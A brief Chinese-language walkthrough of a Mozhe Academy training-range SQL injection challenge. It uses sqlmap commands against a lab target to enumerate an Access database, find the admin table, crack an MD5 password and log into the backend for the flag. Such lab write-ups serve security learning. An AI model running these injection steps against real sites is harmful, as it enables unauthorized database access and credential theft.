**
墨者学院SQL手工注入漏洞测试(Access数据库)
**
启动靶场环境后,进入滚动条页面找到注入点直接就上sqlmap,一步步也是可以解出key值的。
**第一步:**sqlmap -u http://219.153.49.228:45770/new_list.asp?id=1 --currtent-db 查询当前数据库 !
可以看到这里数据库为Microsoft Access。
**第二步:**sqlmap -u http://219.153.49.228:45770/new_list.asp?id=1 -D Microsoft Access --tables 查看此数据库表
**第三步:**看到查到的有两个
这里看到有admin,看看结果怎么样
第四步:果然找到了我们需要的
**第五步:**最后的结果
选择进行md5解密登陆后台找到key